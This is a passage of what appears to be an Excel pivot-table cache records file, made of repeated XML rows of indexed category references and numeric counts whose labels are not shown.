    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="14"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="14"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="14"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="14"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="14"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="14"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="15"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="15"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="15"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="15"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="20"/>
    <x v="15"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="30"/>
    <x v="15"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="15"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="15"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="15"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="15"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="15"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="15"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="15"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="15"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="16"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="16"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="16"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="16"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="16"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="17"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="17"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="18"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="18"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="18"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="18"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="15"/>
    <x v="18"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="18"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="405"/>
    <x v="18"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="23"/>
    <x v="18"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="18"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="18"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="18"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="18"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="18"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="18"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="19"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="19"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="19"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="19"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="20"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="20"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="20"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="20"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="20"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="20"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="20"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="20"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="20"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="20"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="20"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="20"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="20"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="20"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="21"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="21"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="21"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="21"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="21"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="21"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="21"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="21"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="21"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="21"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="28"/>
    <x v="21"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="16"/>
    <x v="21"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="21"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="21"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="17"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="17"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="29"/>
    <x v="17"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="55"/>
    <x v="17"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="17"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="139"/>
    <x v="17"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="22"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="22"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="22"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="22"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="22"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="22"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="22"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="22"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="22"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="22"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="23"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="23"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="23"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="40"/>
    <x v="23"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="23"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="23"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="24"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="24"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="24"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="24"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="24"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="24"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="24"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="24"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="24"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="24"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="24"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="24"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="300"/>
    <x v="24"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="24"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="25"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="25"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="25"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="38"/>
    <x v="25"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="25"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="25"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="26"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="26"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="26"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="26"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="21"/>
    <x v="26"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="40"/>
    <x v="26"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="40"/>
    <x v="26"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="40"/>
    <x v="26"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="26"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="26"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="80"/>
    <x v="26"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="68"/>
    <x v="26"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="26"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="26"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="27"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="27"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="27"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="27"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="27"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="27"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="27"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="27"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="27"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="27"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="27"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="27"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="27"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="27"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="28"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="28"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="28"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="28"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="20"/>
    <x v="28"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="28"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="28"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="28"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="28"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="28"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="16"/>
    <x v="28"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="28"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="28"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="28"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="29"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="3"/>
    <x v="29"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="29"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="7"/>
    <x v="29"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="29"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="29"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="29"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="29"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="29"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="29"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="29"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="29"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="29"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="29"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="30"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="28"/>
    <x v="30"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="120"/>
    <x v="30"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="39"/>
    <x v="30"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="30"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="30"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="31"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="31"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="31"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="31"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="31"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="31"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="17"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="33"/>
    <x v="17"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="56"/>
    <x v="17"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="18"/>
    <x v="17"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="151"/>
    <x v="17"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="32"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="32"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="32"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="32"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="32"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="33"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="33"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="33"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="33"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="33"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="33"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="33"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="33"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="33"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="33"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="141"/>
    <x v="33"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="104"/>
    <x v="33"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="33"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="33"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="9"/>
    <x v="34"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
